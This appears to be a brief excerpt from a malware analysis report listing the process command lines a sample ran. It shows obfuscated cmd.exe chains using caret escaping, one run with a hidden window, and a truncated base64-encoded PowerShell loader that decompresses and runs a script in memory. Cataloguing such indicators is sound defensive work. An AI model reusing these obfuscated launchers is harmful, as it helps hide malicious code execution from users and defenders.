Technical information
- '<SYSTEM32>\cmd.exe' GqGMMjv EKXmaYwhWwrOpmdirGUNBAhoQcT IluAvEj & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %FUvEwAwEPzPLEdi%=ZaaCJqzKwd&&set %TXJMuwHzzASw%=p&&set %brpjFicY%=o^w&...
- '<SYSTEM32>\cmd.exe' GqGMMjv EKXmaYwhWwrOpmdirGUNBAhoQcT IluAvEj & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %FUvEwAwEPzPLEdi%=ZaaCJqzKwd&&set %TXJMuwHzzASw%=p&&set %brpjFicY%=o^w&...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAGUAbgBWADoAYwBPAE0AcwBwAGUAYwBbADQALAAyADYALAAyADUAXQAtAEoATwBpAG4AJwAnACkAKABuAEUAVwAtAG8AQgBKAEUAQwBUACAAIABzAFkAUwBUAGUAbQAuAEkAbwAuAEMAbwBtAFAAcgBlAHMAcwBJAE8ATgAuAEQARQBmAE...